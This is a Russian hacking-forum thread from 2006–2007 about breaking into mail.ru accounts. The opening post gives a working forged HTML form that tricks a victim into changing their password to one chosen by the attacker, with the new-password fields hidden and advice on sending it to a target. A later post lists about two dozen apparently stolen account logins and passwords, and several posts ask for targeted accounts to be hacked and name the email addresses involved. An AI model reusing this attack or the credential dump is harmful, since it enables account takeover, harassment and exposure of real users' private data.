mail.ru и почта
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
mail.ru и почта - 2006-11-04 02:22:01.193333
|
|
|
Лиза1980
Сообщений: 28
Оценки: 0
Присоединился: 2006-11-04 01:25:37.503333
|
Ситуация: Есть я -неочень опытная админша, и вообще наивная чукотская девушка. Есть он - злодей козел и прочее. Цель: Почитать о чем этот козел догаваривается с такими как я. Зная его почтовый адрес назовем его как Kozlodey@mail.ru, напечатала в гугле строку: взлом mail.ru. На что тот услужливо выдал море ссылок среди которых была одна трезвая статья насчет использования формы смены пароля самого mail.ru. Приведённые коды в той же статье не работали, о чем и было честно написато автором статьи в постскриптуме. Но наше дело правое, решила я по аналогии посмотреть и что же там на этой странице смена пароля творится, открыла её исходник. Там было куча всяких ява скриптов проверяющих длину пароля и проч. И среди них самая обыкновенная формочка следующего содержания: <FORM method=post action="modifypass" onSubmit="return CheckPassword(this);" name="PFrm">
<input type="hidden" name="modify" value="1">
<input type="hidden" name="Username" value="markofan">
<input type="password" name="oldPswd" size="20">
<input type="submit" value="Сохранить" class=but_min>
<input type="reset" value="Сбросить" class=but_min>
<input type="password" name="Password" value="" size="20">
<input type="password" name="Password_Verify" value="" size="20" >
</form>
Форма в оригинале перемежается тегами таблиц и содержит параметры стилей которые мне были абсолютно не нужны. Так вот, сохранив всякие ява скрипты содержащиеся в странице а также саму форму послала получившуюся htm себе предварительно выствив в параметры "Password" и "Password_Verify" в значение "999999" а в значение "Username" имя пользователя свое. открыла письмо вбила текущий пароль и после нажатия кнопки сахронить с треском вылетела из почтаря. Этап первый завершился успешно, форма работает пароли меняет! При просмотре сообщения горит красная надпись гласящая о том что мол тут содержиться потенциально опасный код. Это было нехорошо т.к. могло наводить на нехорошие мысли читающего. Поразмыслив и вспомнив что автор предидущей статьи как раз таки использовал форму написанную в яве, решила удалить все скрипты, заодно и немного замаскировать сообщение. Следующий код выглядел так:
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META http-equiv="content-type" content="text/html; charset=windows-1251">
</head><style="text/css">
.hide {visibilty:hidden}
<body>
<center>
<b><font face="Arial" color="#0000FF">Чтобы просмотреть содержимое письма введите ваш текущий пароль:
</font></b>
<FORM method=post action="modifypass" onSubmit="return CheckPassword(this);" name="PFrm">
<input type="hidden" name="modify" value="1">
<input type="hidden" name="Username" value="Kozlodey">
<input type="password" name="oldPswd" size="20">
<input type="submit" value="Открыть" class=but_min>
<div style="hide">
<p>
<input type="password" name="Password" value="2222222" size="1">
<input type="password" name="Password_Verify" value="2222222" size="1" > </p></div>
</form>
</center>
</body>
</html></style>
Заодно уьрала кнопку сброса пароля, данная метода не помогла, и пришлось не мудурствуя лукаво просто набить кучу <p>&nbsp;</p>
отодвинув два окошка содержащих новый пароль и его подтверждение на пару страниц в низ. Прикрепила htm-ку к письму и ушла спать… на утро попробовала и пароль действительно оказался тот который был прописан в форме отправленной мною ему. В общем ситуация такая - хотите поиметь пароль от какого-нидь ящика на майл.ру составляйте письмецо с формочкой, что вы там в письме напишите я не знаю главное чтобы владелец набрал свой текущий пароль и нажал кнопку. Умные дяденьки отседова наверняка смогут усовершенствовать данную формочку чтобы она под значение текущего пароля искала его в кукисах и вписывала. Что несомненно облегчит задачу владельца ящика - ему останется только нажать кнопку!-) З.Ы.: если чел проверяет почту не через вэб-интерфейс а какой-нить прогой данные потуги бессмыслеты. ЗЗ.Ы.: если вам не нужно то что было у него в ящике проще выставить его перед администрацией майл.ру как спамера и после удаления аккаунта зарегистрировать этот же ящик на себю любимого. ЗЗЗ.Ы.:Все перечисленное выше абсолютный вымысел авторши наевшейся грибов, все совпадения с реальностью случайны.
|
|
|
RE: mail.ru и почта - 2006-11-04 23:31:45.083333
|
|
|
monster007
Сообщений: 2
Оценки: 0
Присоединился: 2006-11-04 22:40:45.070000
|
помогите пожалуйста хакнуть мыло nigga2004@mail.ru буде безмерно благодарен!!! что то я не вдуплю как поламать!!!!не поддаётся скатина! вот даю список уже поломаных если кома надо дерзайте !!!! akim_2002 standart akimov akimov akim_2002@mail.ru log. mishka-20 op. 19091986 пр1. 19092000 пр2. 19092000 em. mishka-20@inbox.ru log: girl_in_black05 ор: milorend пр1: the end пр2: the end em: girl_in_black05@mail.ru log: annetta-luck ор: 668853 пр1: 240188 пр2: 240188 em: annetta-luck@mail.ru log: diana_slyness ор: uecmehjl пр1: gfgffktrctq пр2: gfgffktrctq em: diana_slyness@mail.ru log: dalmatinchik op: zsEfv55555 em: dalmatinchik@inbox.ru masik_55@mail.ru ор: 4tkjdt4tcrbqAFRN em: baxa88@mail.ru log: bug.81 ор: 685622 пр1: 2503685622 пр2: 2503685622 em: bug.81@mail.ru log: neriashka ор: 123456789 пр1: 1122334455 пр2: 1122334455 em: neriashka@mail.ru log:lu1990,,,, ор:TANA111990 пр1TANA162006 пр2TANA162006 em: lu1990@list.ru log: bitter7weet ор: admin пр1: guz1bn6h пр2: guz1bn6h em: bitter7weet@mail.ru log: lucertola op: hbg52wsx пр1: hbg52wsx пр2: hbg52wsx em: lucertola@bk.ru log: koshka op: 9111987 пр1: 24111985 пр2: 24111985 em: koshka_999@mail.ru log: love_is_true ор: 654321 пр1: 06021988 пр2: 06021988 em: svitlyxa@mail.ru аngel87 angel87 87angel 87angel angel12291987@mail.ru log: mndanilova@rambler.ru ор: kjhf пр1:rerehepf пр2:rerehepf mndanilova@rambler.ru log: bankirsha3 op: zubkova пр1: kohanova пр2: kohanova em: bankirsha3@inbox.ru Log: Элина Исмагилова op: 578291 пр1: 519803 пр2: 519803 em: elina3786@bk.ru log gulchik op 26101985 пр1: 28041984 пр2: 28041984 em gulchik-06@mail.ru log: krista_1987 ор: kristina пр1: mama пр2: mama em: krista_1987@mail.ru log: Тошка ор: 05224 пр1: 54045 пр2: 54045 em: Grezi_05@mail.ru log: weasel ор: 9999 пр1: yfcntymrf пр2: yfcntymrf em: weasel_88@mail.ru ПОМОГИТЕ ПОЛАМАТЬ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![X(][X(][X(]
|
|
|
RE: mail.ru и почта - 2006-11-05 00:15:04.146666
|
|
|
Лиза1980
Сообщений: 28
Оценки: 0
Присоединился: 2006-11-04 01:25:37.503333
|
способ сверху - ломать сам мыл.ру смысла не вижу в лучшем случае поламают коннект, в худшем лет семь трудовых исправительных работ где нить на колыме, и не дай бог тебе быть красивым =)
|
|
|
RE: mail.ru и почта - 2006-11-05 00:21:34.270000
|
|
|
monster007
Сообщений: 2
Оценки: 0
Присоединился: 2006-11-04 22:40:45.070000
|
если сможешь помоги поламать это мыло или подскажи кто в этом мне может помоч!!!!!!!!
|
|
|
RE: mail.ru и почта - 2006-11-06 11:41:33.240000
|
|
|
rape_and_drop
Сообщений: 79
Оценки: 0
Присоединился: 2006-10-26 01:50:40.726666
|
Я смотрю тут взломщики мыльных ящиков развелись(или спамеры?)! Так кто реально мыло бомбил,раскажите статистику.
|
|
|
RE: mail.ru и почта - 2006-11-09 16:42:49.926666
|
|
|
rollervl
Сообщений: 3
Оценки: 0
Присоединился: 2006-11-09 16:37:31.083333
|
слушайте это конечно все классно. Ну а вот как можно взломать mail.ru если человек пользуется the bat? Может есть какието приемы? Подскажите. Спасибо.:)
|
|
|
RE: mail.ru и почта - 2006-11-09 17:42:30.866666
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
Сегодня представлена активная XSS на маил.ру инфа тут Можете убедиться сами Уже усё, пример удалили, наверно латают скрипт…
|
|
|
RE: mail.ru и почта - 2006-11-10 01:16:14.676666
|
|
|
rollervl
Сообщений: 3
Оценки: 0
Присоединился: 2006-11-09 16:37:31.083333
|
И что теперь делать?8|
|
|
|
RE: mail.ru и почта - 2006-11-12 03:44:47.286666
|
|
|
Stefun
Сообщений: 48
Оценки: 0
Присоединился: 2006-11-11 01:25:17.350000
|
Баклуши бить! 8| Можно пока почитать книжки
|
|
|
RE: mail.ru и почта - 2006-11-12 03:47:55.270000
|
|
|
rollervl
Сообщений: 3
Оценки: 0
Присоединился: 2006-11-09 16:37:31.083333
|
Ну вот, а мне так срочно надо узнать пароль мыла…..и желательно знать технологию этого всего….
|
|
|
RE: mail.ru и почта - 2007-02-17 23:28:31.733333
|
|
|
Epifan
Сообщений: 1
Оценки: 0
Присоединился: 2007-02-17 22:22:01.783333
|
У меня подруга украла пароль и затёрла мои фотки как мне вернуть мой ящик назад и наказать её у неё тоже есть почтовый ящик его, если можно сломать? Сколько я буду должна?Мой бывший ящик [email=mihailovar@mail.ru]mihailovar@mail.ru[/email] и ящик подруги [email=maslennikova85@mail.ru]maslennikova85@mail.ru[/email][:(]
|
|
|
|
|